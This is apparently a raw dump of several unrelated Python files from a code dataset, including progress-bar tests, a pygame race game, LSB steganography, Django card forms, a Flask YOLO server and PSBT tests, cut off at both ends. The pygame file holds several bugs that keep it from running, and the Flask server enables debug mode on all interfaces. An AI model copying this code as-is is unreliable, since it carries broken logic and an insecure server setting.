test_run_until_the_end_order_arrives_two_reports(pickup0, mock_queue, presentation):\n\n report1 = mock.MagicMock()\n report2 = mock.MagicMock()\n mock_queue.empty.side_effect = [False, False, False, True]\n mock_queue.get.side_effect = [report1, None, report2] # report2 arrives\n # after the end_order\n pickup0._run_until_the_end_order_arrives()\n\n assert [mock.call.present(report1), mock.call.present(report2)] == presentation.mock_calls\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef mocktime(monkeypatch):\n ret = mock.MagicMock(return_value = 1000.0)\n monkeypatch.setattr(time, 'time', ret)\n return ret\n\ndef test_run_until_reports_stop_coming_no_report(pickup0, mock_queue, presentation, mocktime):\n presentation.active.side_effect = [False]\n pickup0._run_until_reports_stop_coming()\n assert [] == presentation.present.mock_calls\n\ndef test_run_until_reports_stop_coming_one_report(pickup0, mock_queue, presentation, mocktime):\n presentation.active.side_effect = [True, False]\n report = mock.MagicMock()\n mock_queue.empty.side_effect = [False, False, True]\n mock_queue.get.side_effect = [report, None]\n pickup0._run_until_reports_stop_coming()\n assert [mock.call(report)] == presentation.present.mock_calls\n\ndef test_run_until_reports_stop_coming_one_report_timeout(pickup0, mock_queue, presentation, mocktime):\n presentation.active.return_value = True\n report = mock.MagicMock()\n mock_queue.empty.return_value = True\n mock_queue.get.side_effect = [report, None]\n mocktime.side_effect = [1000.0, 1003.0]\n pickup0._run_until_reports_stop_coming()\n assert [ ] == presentation.present.mock_calls\n\n##__________________________________________________________________||\n","sub_path":"tests/unit/progressbar/test_ProgressReportPickup.py","file_name":"test_ProgressReportPickup.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"490422499","text":"import pygame, sys\nimport random\n\nclass Runner():\n __customes = (\"turtle\", \"fish\", \"prawn\", \"moray\", \"octopus\")\n def __init__(self, x=0, y=0):\n ixCustome =random.randint(0,4)\n \n self.custome =pygame.image.load(\"images/{}.png\".format(__self.customes[ixCustome]))\n self.position = [x,y]\n self.name = \"\"\n \n def avanzar (self):\n self.position [0] += random.randint (1,6)\n\nclass Game():\n runners= []\n __posY= (160, 200, 240, 280)\n __names= (\"Speedy\", \"Lucera\", \"Alonso\", \"Torcuata\")\n __startLine=-5\n __finishLine =620\n \n def __init__(self):\n self.__screen = pygame.display.set_mode((640, 480))\n self.__background = pygame.image.load(\"images/background.png\")\n pygame.display.set_caption (\"Carrera de bichos\")\n \n for i in range (4):\n theRunner = Runner (self.__startLine,self.__posY[i])\n theRunner.name = self.__names[i]\n self.runners.append(theRunner)\n \n \n def competir (self):\n gameOver =False\n #comprobamos eventos\n while not gameOver:\n for event in pygame.event.get():\n if event.type== pygame.QUIT:\n gameOver =True\n \n #actualizamos codigo\n for activeRunner in self.runners:\n active.Runner.avanzar()\n if activeRunner.position[0] >= self.__finishLine:\n print (\"{} ha ganado\".format(activeRunner. name))\n \n # Refrescamos la pantalla\n self.__screen.blit(self.__background, (0,0))\n \n for runner in self.__runners:\n self.__screen.blit(runner.costume, runner.position)\n\n pygame.dispay.flip()\n \n #En el momento que tenemos un ganador cerramos programa \n while True:\n for event in pygame.event.get():\n if event.type==pygame.QUIT():\n pygame.quit()\n sys.exit\n \n \nif __name__== \"__main__\":\n \n game = Game()\n pygame.font.init()\n game.competir()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"253441982","text":"\"\"\"A program that encodes and decodes hidden messages in images through LSB steganography\"\"\"\nfrom PIL import Image, ImageFont, ImageDraw\nimport textwrap\n\ndef decode_image(file_location=\"images/encoded_sample.png\"):\n \"\"\"Decodes the hidden message in an image\n\n file_location: the location of the image file to decode. By default is the provided encoded image in the images folder\n \"\"\"\n encoded_image = Image.open(file_location)\n\n x_size = encoded_image.size[0]\n y_size = encoded_image.size[1]\n\n decoded_image = Image.new(\"RGB\", encoded_image.size)\n pixels = decoded_image.load()\n\n for x in range(x_size):\n for y in range(y_size):\n if lsb_of_red_pixel(encoded_image, x, y):\n pixels[x, y] = (255,255,255)\n else:\n pixels[x, y] = (0, 0, 0)\n\n #pixels[x, y] = [(0,0,0) if lsb_of_pixel(red_channel, x, y) else (1,1,1)]\n\n decoded_image.save(\"images/decoded_image.png\")\n decoded_image.show()\n\ndef write_text(text_to_write, image_size):\n \"\"\"Writes text to an RGB image. Automatically line wraps\n\n text_to_write: the text to write to the image\n image_size: size of the resulting text image. Is a tuple (x_size, y_size)\n \"\"\"\n image_text = Image.new(\"RGB\", image_size)\n font = ImageFont.load_default().font\n drawer = ImageDraw.Draw(image_text)\n\n #Text wrapping. Change parameters for different text formatting\n margin = offset = 10\n for line in textwrap.wrap(text_to_write, width=60):\n drawer.text((margin,offset), line, font=font)\n offset += 10\n return image_text\n\ndef encode_image(text_to_encode, template_image=\"images/samoyed.jpg\", output_image=\"images/samoyed.secret.png\"):\n \"\"\"Encodes a text message into an image\n\n text_to_encode: the text to encode into the template image\n template_image: the image to use for encoding. An image is provided by default.\n \"\"\"\n\n image = Image.open(template_image)\n pixels = image.load()\n\n x_size = image.size[0]\n y_size = image.size[1]\n\n for x in range(x_size):\n for y in range(y_size):\n if lsb_of_red_pixel(image, x, y):\n pixels[x,y] = (image.getpixel((x, y))[0] - 1, image.getpixel((x, y))[1], image.getpixel((x, y))[2])\n\n text_image = Image.new(\"RGB\", image.size)\n\n usr_font = ImageFont.truetype(\"ComicNeue.otf\", 25)\n d_usr = ImageDraw.Draw(text_image)\n d_usr = d_usr.text((10,10), text_to_encode, (255,255,255), font=usr_font)\n\n for x in range(x_size):\n for y in range(y_size):\n if lsb_of_red_pixel(text_image, x, y):\n pixels[x,y] = (image.getpixel((x, y))[0] + 1, image.getpixel((x, y))[1], image.getpixel((x, y))[2])\n\n image.save(output_image)\n\n\n\ndef lsb_of_red_pixel(image, x, y):\n return image.getpixel((x, y))[0] % 2\n\nif __name__ == '__main__':\n # print(\"Decoding the image...\")\n # decode_image()\n\n print(\"Encoding the image...\")\n encode_image(\"Hi meme\")\n\n print(\"Decoding Encoded image...\")\n decode_image(\"images/samoyed.secret.png\")\n","sub_path":"steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"568226148","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\n# Import data (Make sure to parse dates. Consider setting index column to 'date'.)\ndf = pd.read_csv('./fcc-forum-pageviews.csv', index_col=0, parse_dates=True)\n\n# Clean data\ndf = df[(df['value'] >= (df['value'].quantile(0.025))) & (df['value'] <= (df['value'].quantile(0.975)))]\n\ndef draw_line_plot():\n # Draw line plot\n fig = df.plot(title='Daily freeCodeCamp Forum Page Views 5/2016-12/2019', \n xlabel='Date',\n ylabel='Page Views',\n figsize=(15,5),\n legend=False,\n style='-r').get_figure()\n\n # Save image and return fig (don't change this part)\n fig.savefig('line_plot.png')\n return fig\n\ndef draw_bar_plot():\n # Copy and modify data for monthly bar plot\n df_bar = df.copy()\n df_bar['year'] = df_bar.index.year\n df_bar['Months'] = df_bar.index.month_name()\n\n months = ['January', 'February', 'March', 'April','May','June', 'July', 'August','September', 'October', 'November', 'December']\n df_bar['Months'] = pd.CategoricalIndex(df_bar['Months'], categories=months, ordered=True)\n\n df_bar.set_index('year', inplace=True)\n df_bar = df_bar.groupby([df_bar.index, df_bar['Months']])['value'].sum().unstack()\n\n # Draw bar plot\n fig = df_bar.plot(kind='bar',\n xlabel='Years',\n ylabel='Average Page Views',\n figsize=(9,9),\n legend=True).get_figure()\n\n # Save image and return fig (don't change this part)\n fig.savefig('bar_plot.png')\n return fig\n\ndef draw_box_plot():\n # Prepare data for box plots (this part is done!)\n df_box = df.copy()\n df_box.reset_index(inplace=True)\n df_box['Year'] = [d.year for d in df_box.date]\n df_box['Month'] = [d.strftime('%b') for d in df_box.date]\n df_box = df_box.rename(columns={'value':'Page Views'})\n\n # Draw box plots (using Seaborn)\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 8))\n \n sns.boxplot(x='Year', y='Page Views', data=df_box, ax=ax1)\n sns.boxplot(x='Month', y='Page Views', data=df_box, ax=ax2, \n order=['Jan', 'Feb', 'Mar', 'Apr','May','Jun', 'Jul', 'Aug','Sep', 'Oct', 'Nov', 'Dec'])\n ax1.set_title('Year-wise Box Plot (Trend)')\n ax2.set_title('Month-wise Box Plot (Seasonality)')\n\n # Save image and return fig (don't change this part)\n fig.savefig('box_plot.png')\n return fig\n","sub_path":"8-Data_Analysis_with_Python_Certification/4-Page_View_Time_Series_Visualizer/time_series_visualizer.py","file_name":"time_series_visualizer.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"296629479","text":"from django import forms\nfrom .models import Tarjeta\nfrom django.contrib.auth import authenticate\nfrom datetime import date\n\nclass CrearTarjetaForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['numero'].widget.attrs['class'] = 'form-control'\n self.fields['numero'].widget.attrs['required'] = 'True'\n self.fields['numero'].widget.attrs['placeholder'] = 'Ingresa el número de la tarjeta'\n self.fields['saldo'].widget.attrs['placeholder'] = 'Ingresa el saldo que deseas agregar'\n self.fields['saldo'].widget.attrs['required'] = 'True'\n\n\n\n class Meta:\n\n model=Tarjeta\n fields = (\n 'franquicia',\n 'numero',\n 'fecha_vencimiento',\n 'cvv',\n 'saldo'\n )\n widgets = {\n 'fecha_vencimiento': forms.DateInput(\n\n attrs={\n 'type':'date',\n }\n ),\n 'cvv': forms.TextInput(\n\n attrs={\n 'class':'form-control',\n 'placeholder':'Ingresa el código cvv',\n 'required': 'True'\n }\n ),\n 'franquicia': forms.Select(\n\n attrs={\n 'class': 'form-control',\n 'required': 'True'\n }\n ),\n\n }\n\n def clean_numero(self):\n numero = self.cleaned_data['numero']\n\n if len(numero) != 16:\n self.add_error('numero', forms.ValidationError('La tarjeta debe contener 16 digitos.'))\n elif not all(x.isdigit() for x in numero):\n self.add_error('numero', forms.ValidationError('La tarjeta solo debe contener números.'))\n\n return numero\n\n \"\"\"\n def clean_fecha_vencimiento(self):\n fecha_vencimiento = self.cleaned_data['fecha_vencimiento']\n\n years = fecha_vencimiento.year - date.today().year\n\n if years == 0:\n\n months = date.today().month - fecha_vencimiento.month\n\n if months >= 0:\n self.add_error('fecha_vencimiento', forms.ValidationError('La tarjeta tiene una fecha menor o está a punto de vencerse. Por favor, intenta nuevamente.'))\n else:\n self.add_error('fecha_vencimiento', forms.ValidationError('La tarjeta tiene una fecha menor o está a punto de vencerse. Por favor, intenta nuevamente.'))\n\n return fecha_vencimiento\n \"\"\"\n def clean_cvv(self):\n cleaned_data = super(CrearTarjetaForm, self).clean()\n cvv = str(self.cleaned_data['cvv'])\n if int(cvv.__len__()) != 3:\n self.add_error('cvv', forms.ValidationError('El cvv debe tener 3 digitos.'))\n return self.cleaned_data\n\n def clean_saldo(self):\n saldo = self.cleaned_data['saldo']\n\n if saldo < 1000:\n self.add_error('saldo', forms.ValidationError('El saldo debe ser mayor o igual a $1000'))\n\n return saldo\n\nclass ActualizarTarjetaForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['saldo'].widget.attrs['class'] = 'form-control'\n self.fields['saldo'].widget.attrs['required'] = 'True'\n\n class Meta:\n model = Tarjeta\n fields = ('saldo',)\n\n def clean_saldo(self):\n saldo = self.cleaned_data['saldo']\n\n if saldo < 1000:\n self.add_error('saldo', forms.ValidationError('El saldo debe ser mayor o igual a 1000'))\n\n return saldo\n\n\n","sub_path":"applications/tarjetas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"140357379","text":"#Importing all the required libraries like flask, cv2, numpy\r\nimport flask\r\nfrom flask import request\r\nimport cv2\r\nimport numpy as np\r\nimport json\r\n\r\n#Importing ThreadPoolExecutor Library for Multithreading\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\n#Creating an instance of ThreadPoolExecutor and setting 4 as maximum number of workers i.e\r\n#this thread pool will only have 4 concurrent threads\r\nexecutor = ThreadPoolExecutor(4)\r\n\r\n#Creates the Flask application object, which contains data about the application\r\napp = flask.Flask(__name__)\r\n\r\n#Defining default route as GET request and mapping it to test() method for testing the application\r\n@app.route('/')\r\ndef test():\r\n return \"Hello, World!\"\r\n\r\n#Defining /api/object_detection route as POST request and mapping it to image_scan() method for recieving client request\r\n@app.route('/api/object_detection', methods=['POST'])\r\ndef image_scan():\r\n\r\n #Reading file buffer from the request object sent by the client\r\n img_str = request.files[\"image\"].read()\r\n\r\n #Executing image_scan_implimentation() as individual threads by ThreadPoolExecutor object and passing image data as argument\r\n exec = executor.submit(image_scan_implimentation, img_str)\r\n\r\n #Returning the python dict to the client which image_scan_implimentation() method is returning\r\n return exec.result()\r\n\r\n\r\n#Method implimenting the business logic of the API by taking the buffer image and returning the dict having list of objects detected along\r\n#with their accuracy\r\ndef image_scan_implimentation(img_str):\r\n\r\n #Loading trained model of YOLO along with its config file.\r\n net = cv2.dnn.readNet(\"yolov3-tiny.weights\", \"yolov3-tiny.cfg\")\r\n\r\n #Reading the objects names that YOLO can detect from coc.names file and storing them in list classes\r\n classes = []\r\n with open(\"coco.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\n\r\n layer_names = net.getLayerNames()\r\n output_layers = [layer_names[i[0] - 1]\r\n for i in net.getUnconnectedOutLayers()]\r\n\r\n nparr = np.frombuffer(img_str, np.uint8)\r\n\r\n # cv2.IMREAD_COLOR in OpenCV 3.1\r\n img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\r\n\r\n img = cv2.resize(img_np, None, fx=0.4, fy=0.4)\r\n\r\n # Detecting objects by using Blob which is used to extract feature from the image and \r\n # to resize them to 416x416 which gives both accuracy and speed\r\n blob = cv2.dnn.blobFromImage(\r\n img, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n net.setInput(blob)\r\n\r\n #object_info is an array that conains all the informations about objects detected, their position and the confidence about the detection.\r\n object_info = net.forward(output_layers)\r\n\r\n objects_list = []\r\n\r\n #Traversing the object_info array to find the objects detected and their confidence(position)\r\n for obj in object_info:\r\n for detection in obj:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n accuracy = scores[class_id]\r\n #Taking accuracy/confidence level 1% for detection of objects.\r\n if accuracy > 0.01:\r\n objects_dict = {}\r\n objects_dict[\"label\"] = str(classes[class_id])\r\n objects_dict[\"accuracy\"] = str(round(float(accuracy)*100, 2))\r\n objects_list.append(objects_dict)\r\n\r\n #Returning the python dict having all the info about the objects detected by the model\r\n return {\"objects\": objects_list}\r\n\r\nif __name__ == \"__main__\":\r\n #Using flask object to runs the application server on Port 2020 in debug mode with host - 0.0.0.0\r\n app.run(host=\"0.0.0.0\", port=2020, debug=True)\r\n","sub_path":"Client/iWebLens_server.py","file_name":"iWebLens_server.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"92150478","text":"\"\"\"Tests for PSBT wrappers\"\"\"\nimport unittest\nfrom wallycore import *\n\nSAMPLE = \"cHNidP8BAFICAAAAAZ38ZijCbFiZ/hvT3DOGZb/VXXraEPYiCXPfLTht7BJ2AQAAAAD/////AfA9zR0AAAAAFgAUezoAv9wU0neVwrdJAdCdpu8TNXkAAAAATwEENYfPAto/0AiAAAAAlwSLGtBEWx7IJ1UXcnyHtOTrwYogP/oPlMAVZr046QADUbdDiH7h1A3DKmBDck8tZFmztaTXPa7I+64EcvO8Q+IM2QxqT64AAIAAAACATwEENYfPAto/0AiAAAABuQRSQnE5zXjCz/JES+NTzVhgXj5RMoXlKLQH+uP2FzUD0wpel8itvFV9rCrZp+OcFyLrrGnmaLbyZnzB1nHIPKsM2QxqT64AAIABAACAAAEBKwBlzR0AAAAAIgAgLFSGEmxJeAeagU4TcV1l82RZ5NbMre0mbQUIZFuvpjIBBUdSIQKdoSzbWyNWkrkVNq/v5ckcOrlHPY5DtTODarRWKZyIcSEDNys0I07Xz5wf6l0F1EFVeSe+lUKxYusC4ass6AIkwAtSriIGAp2hLNtbI1aSuRU2r+/lyRw6uUc9jkO1M4NqtFYpnIhxENkMak+uAACAAAAAgAAAAAAiBgM3KzQjTtfPnB/qXQXUQVV5J76VQrFi6wLhqyzoAiTACxDZDGpPrgAAgAEAAIAAAAAAACICA57/H1R6HV+S36K6evaslxpL0DukpzSwMVaiVritOh75EO3kXMUAAACAAAAAgAEAAIAA\"\n\n\nclass PSBTTests(unittest.TestCase):\n\n def _try_invalid(self, fn, psbt, *args):\n with self.assertRaises(ValueError):\n fn(None, 0, *args) # Null PSBT\n with self.assertRaises(ValueError):\n fn(psbt, 1, *args) # Invalid index\n\n def _try_set(self, fn, psbt, valid_value, null_value=None):\n fn(psbt, 0, valid_value) # Set\n fn(psbt, 0, null_value) # Un-set\n self._try_invalid(fn, psbt, valid_value)\n\n def _try_get_set_b(self, setfn, getfn, lenfn, psbt, valid_value, null_value=None):\n self._try_set(setfn, psbt, valid_value, null_value)\n setfn(psbt, 0, valid_value) # Set\n self._try_invalid(lenfn, psbt)\n self._try_invalid(getfn, psbt)\n ret = getfn(psbt, 0) # Get\n self.assertEqual(valid_value, ret)\n\n def _try_get_set_m(self, setfn, sizefn, lenfn, getfn, findfn, psbt, valid_value, valid_item):\n self._try_set(setfn, psbt, valid_value, None)\n self._try_invalid(sizefn, psbt)\n self.assertEqual(sizefn(psbt, 0), 0)\n setfn(psbt, 0, valid_value) # Set\n self.assertEqual(sizefn(psbt, 0), 1) # 1 item in the map\n self._try_invalid(lenfn, psbt, 0)\n with self.assertRaises(ValueError):\n lenfn(psbt, 0, 1) # Invalid subindex\n map_val = getfn(psbt, 0, 0)\n self.assertTrue(len(map_val) > 0)\n self.assertEqual(lenfn(psbt, 0, 0), len(map_val))\n self._try_invalid(findfn, psbt, map_val)\n self.assertEqual(findfn(psbt, 0, valid_item), 1)\n\n\n def test_psbt(self):\n psbt = psbt_from_base64(SAMPLE)\n\n # Roundtrip to/from bytes\n psbt_bytes = psbt_to_bytes(psbt, 0)\n psbt_tmp = psbt_from_bytes(psbt_bytes)\n self.assertEqual(hex_from_bytes(psbt_bytes),\n hex_from_bytes(psbt_to_bytes(psbt_tmp, 0)))\n\n self.assertIsNotNone(psbt_get_global_tx(psbt))\n\n for fn, ret in [(psbt_get_version, 0),\n (psbt_get_num_inputs, 1),\n (psbt_get_num_outputs, 1)]:\n self.assertEqual(fn(psbt), ret)\n with self.assertRaises(ValueError):\n fn(None) # Null PSBT\n\n # Conversion to base64 should round trip\n self.assertEqual(psbt_to_base64(psbt, 0), SAMPLE)\n\n # Combining with ourselves shouldn't change the PSBT\n psbt_combine(psbt, psbt)\n self.assertEqual(psbt_to_base64(psbt, 0), SAMPLE)\n\n # Test setters\n dummy_tx = psbt_get_global_tx(psbt)\n self.assertIsNotNone(dummy_tx)\n\n dummy_txout = tx_output_init(1234567, bytearray(b'\\x00' * 33))\n\n dummy_witness = tx_witness_stack_init(5)\n self.assertIsNotNone(dummy_witness)\n\n dummy_bytes = bytearray(b'\\x00' * 32)\n dummy_pubkey = bytearray(b'\\x02'* EC_PUBLIC_KEY_LEN)\n dummy_fingerprint = bytearray(b'\\x00' * BIP32_KEY_FINGERPRINT_LEN)\n dummy_path = [1234, 1234, 1234]\n dummy_sig = bytearray(b'\\x00' * 72)\n if is_elements_build():\n dummy_nonce = bytearray(b'\\x00' * WALLY_TX_ASSET_CT_NONCE_LEN)\n dummy_bf = bytearray(b'\\x00' * BLINDING_FACTOR_LEN)\n dummy_commitment = bytearray(b'\\x00' * ASSET_COMMITMENT_LEN)\n dummy_asset = bytearray(b'\\x00' * ASSET_TAG_LEN)\n\n dummy_keypaths = map_init(0)\n self.assertIsNotNone(dummy_keypaths)\n map_add_keypath_item(dummy_keypaths, dummy_pubkey, dummy_fingerprint, dummy_path)\n self.assertEqual(map_find(dummy_keypaths, dummy_pubkey), 1)\n\n dummy_signatures = map_init(0)\n self.assertIsNotNone(dummy_signatures)\n map_add(dummy_signatures, dummy_pubkey, dummy_sig)\n self.assertEqual(map_find(dummy_signatures, dummy_pubkey), 1)\n\n dummy_unknowns = map_init(1)\n self.assertIsNotNone(dummy_unknowns)\n map_add(dummy_unknowns, dummy_pubkey, dummy_fingerprint)\n self.assertEqual(map_find(dummy_unknowns, dummy_pubkey), 1)\n\n #\n # Inputs\n #\n self._try_set(psbt_set_input_utxo, psbt, dummy_tx)\n self._try_invalid(psbt_get_input_utxo, psbt)\n self._try_set(psbt_set_input_witness_utxo, psbt, dummy_txout)\n self._try_invalid(psbt_get_input_witness_utxo, psbt)\n self._try_get_set_b(psbt_set_input_redeem_script,\n psbt_get_input_redeem_script,\n psbt_get_input_redeem_script_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_witness_script,\n psbt_get_input_witness_script,\n psbt_get_input_witness_script_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_final_scriptsig,\n psbt_get_input_final_scriptsig,\n psbt_get_input_final_scriptsig_len, psbt, dummy_bytes)\n self._try_set(psbt_set_input_final_witness, psbt, dummy_witness)\n self._try_invalid(psbt_get_input_final_witness, psbt)\n self._try_get_set_m(psbt_set_input_keypaths,\n psbt_get_input_keypaths_size,\n psbt_get_input_keypath_len,\n psbt_get_input_keypath,\n psbt_find_input_keypath,\n psbt, dummy_keypaths, dummy_pubkey)\n self._try_get_set_m(psbt_set_input_signatures,\n psbt_get_input_signatures_size,\n psbt_get_input_signature_len,\n psbt_get_input_signature,\n psbt_find_input_signature,\n psbt, dummy_signatures, dummy_pubkey)\n self._try_get_set_m(psbt_set_input_unknowns,\n psbt_get_input_unknowns_size,\n psbt_get_input_unknown_len,\n psbt_get_input_unknown,\n psbt_find_input_unknown,\n psbt, dummy_unknowns, dummy_pubkey)\n self._try_set(psbt_set_input_sighash, psbt, 0xff, 0x0)\n self.assertEqual(psbt_get_input_sighash(psbt, 0), 0)\n self._try_invalid(psbt_get_input_sighash, psbt)\n\n if is_elements_build():\n self._try_set(psbt_set_input_value, psbt, 1234567, 0)\n self._try_invalid(psbt_has_input_value, psbt)\n self._try_invalid(psbt_get_input_value, psbt)\n self._try_invalid(psbt_clear_input_value, psbt)\n self.assertEqual(psbt_has_input_value(psbt, 0), 1)\n psbt_clear_input_value(psbt, 0)\n self.assertEqual(psbt_has_input_value(psbt, 0), 0)\n self._try_get_set_b(psbt_set_input_vbf,\n psbt_get_input_vbf,\n psbt_get_input_vbf_len, psbt, dummy_bf)\n self._try_get_set_b(psbt_set_input_asset,\n psbt_get_input_asset,\n psbt_get_input_asset_len, psbt, dummy_asset)\n self._try_get_set_b(psbt_set_input_abf,\n psbt_get_input_abf,\n psbt_get_input_abf_len, psbt, dummy_bf)\n self._try_set(psbt_set_input_pegin_tx, psbt, dummy_tx)\n self._try_invalid(psbt_get_input_pegin_tx, psbt)\n self._try_get_set_b(psbt_set_input_txoutproof,\n psbt_get_input_txoutproof,\n psbt_get_input_txoutproof_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_genesis_blockhash,\n psbt_get_input_genesis_blockhash,\n psbt_get_input_genesis_blockhash_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_claim_script,\n psbt_get_input_claim_script,\n psbt_get_input_claim_script_len, psbt, dummy_bytes)\n\n #\n # Outputs\n #\n self._try_get_set_b(psbt_set_output_redeem_script,\n psbt_get_output_redeem_script,\n psbt_get_output_redeem_script_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_output_witness_script,\n psbt_get_output_witness_script,\n psbt_get_output_witness_script_len, psbt, dummy_bytes)\n self._try_get_set_m(psbt_set_output_keypaths,\n psbt_get_output_keypaths_size,\n psbt_get_output_keypath_len,\n psbt_get_output_keypath,\n psbt_find_output_keypath,\n psbt, dummy_keypaths, dummy_pubkey)\n self._try_get_set_m(psbt_set_output_unknowns,\n psbt_get_output_unknowns_size,\n psbt_get_output_unknown_len,\n psbt_get_output_unknown,\n psbt_find_output_unknown,\n psbt, dummy_unknowns, dummy_pubkey)\n if is_elements_build():\n self._try_get_set_b(psbt_set_output_blinding_pubkey,\n psbt_get_output_blinding_pubkey,\n psbt_get_output_blinding_pubkey_len, psbt, dummy_pubkey)\n self._try_get_set_b(psbt_set_output_value_commitment,\n psbt_get_output_value_commitment,\n psbt_get_output_value_commitment_len, psbt, dummy_commitment)\n self._try_get_set_b(psbt_set_output_vbf,\n psbt_get_output_vbf,\n psbt_get_output_vbf_len, psbt, dummy_bf)\n self._try_get_set_b(psbt_set_output_asset_commitment,\n psbt_get_output_asset_commitment,\n psbt_get_output_asset_commitment_len, psbt, dummy_commitment)\n self._try_get_set_b(psbt_set_output_abf,\n psbt_get_output_abf,\n psbt_get_output_abf_len, psbt, dummy_bf)\n self._try_get_set_b(psbt_set_output_nonce,\n psbt_get_output_nonce,\n psbt_get_output_nonce_len, psbt, dummy_nonce)\n self._try_get_set_b(psbt_set_output_rangeproof,\n psbt_get_output_rangeproof,\n psbt_get_output_rangeproof_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_output_surjectionproof,\n psbt_get_output_surjectionproof,\n psbt_get_output_surjectionproof_len, psbt, dummy_bytes)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/swig_python/contrib/psbt.py","file_name":"psbt.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"423939264","text":"'''\r\nCreated on Nov 10, 2013\r\n\r\n@author: Zoya\r\n'''\r\nfrom REVC import reverse_char\r\nFALSE_RETURN = 'FALSE'\r\n\r\ndef get_deBruijn_graph(lines, k):\r\n result = dict()\r\n for line in lines:\r\n rev_line = ''\r\n for letter in reversed(line):\r\n rev_line += reverse_char(letter)\r\n for i in range(len(line) - k):\r\n result[line[i:i + k]] = line[i + k]\r\n result[rev_line[i:i + k]] = rev_line[i + k ]\r\n print (\"de Bruijn graph for k = %d (len = %d)\" % (k, len(result)))\r\n# print result\r\n return result\r\n\r\ndef get_cyclic_superstring(deBruijn_graph):\r\n result = deBruijn_graph.keys()[0]\r\n next_line = result\r\n for i in range(len(deBruijn_graph) / 2):\r\n if not deBruijn_graph.get(next_line):\r\n return FALSE_RETURN\r\n result += deBruijn_graph.pop(next_line)\r\n next_line = result[-len(next_line):]\r\n# print result\r\n result = deBruijn_graph.keys()[0]\r\n next_line = result\r\n for i in range(len(deBruijn_graph)):\r\n if not deBruijn_graph.get(next_line):\r\n return FALSE_RETURN\r\n result += deBruijn_graph.pop(next_line)\r\n next_line = result[-len(next_line):]\r\n# print result\r\n if len(deBruijn_graph) > 0:\r\n return FALSE_RETURN\r\n return result[:-len(next_line)]\r\n\r\ndef GASM(input_file, output_file):\r\n lines = [line.strip() for line in open(input_file)]\r\n for k in range(min([len(line) for line in lines]) - 1, -1, -1):\r\n deBruijn_graph = get_deBruijn_graph(lines, k)\r\n result = get_cyclic_superstring(deBruijn_graph)\r\n if result != FALSE_RETURN:\r\n break\r\n print (result)\r\n with open(output_file, \"w\") as result_file:\r\n result_file.write(result)\r\n\r\nGASM(\"src/data/rosalind_gasm.txt\", \"src/data/rosalind_gasm_result.txt\")\r\n","sub_path":"src/com/zobar/rosalind/GASM.py","file_name":"GASM.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"519315412","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom skimage import data\nimport radon as rn\nfrom multiprocessing import Process\n\n#CHANGE THIS VALUES\nstep = [45,40,35,30,20,15,10,5,3,2,1,0.5]\ndetectors = [400,350,300,250,200,150,100,50,25]\ndetWidth = [30,45,60,75,90,105,120,135,150,165,180]\n\ndef returnDifference2D(input1, input2):\n if (len(input1) != len(input2)) or (len(input1[0]) != len(input2[0])) : raise NameError(\"Arrays do not have the same size\")\n val = 0\n for X in range(0,len(input1)):\n for Y in range(0, len(input1[0])):\n val += np.power((input1[X,Y]-input2[X,Y]),2)\n return np.sqrt(val)\n\ndef testIterations(step, detectors, width, filter, figSaveName, prefix=\"\"):\n inData = data.imread(\"input.png\", as_grey=True)\n inData = inData/max( inData.flatten() )\n num=0\n stepsArray = np.arange(0, 180, step)\n result = np.zeros(len(stepsArray))\n sinogram = None\n inverseImage = None\n for S, SVal in enumerate(stepsArray):\n num += 1\n sinogram = rn.radonTransform(inData, step, [SVal], detectors, width, sinogram, normalize=False)\n sin2 = sinogram.copy()\n sin2 /= max(sin2.flatten())\n if filter:\n sin2 = rn.filterSinogram(sin2)\n inverseImage = rn.inverseRadonTransform(sin2, step, [SVal], detectorsWidth=width,\n outputWidth=len(inData[0]), outputHeight=len(inData), output=inverseImage, normalize=False)\n else:\n inverseImage = rn.inverseRadonTransform(sin2, step, [SVal], detectorsWidth=width,\n outputWidth=len(inData[0]), outputHeight=len(inData), output=inverseImage, normalize=False)\n\n copy = inverseImage.copy()\n for X in range(0,len(copy)):\n for Y in range(0,len(copy[0])):\n if copy[X][Y] <0: copy[X][Y] =0;\n copy /= max(copy.flatten())\n result[S] = 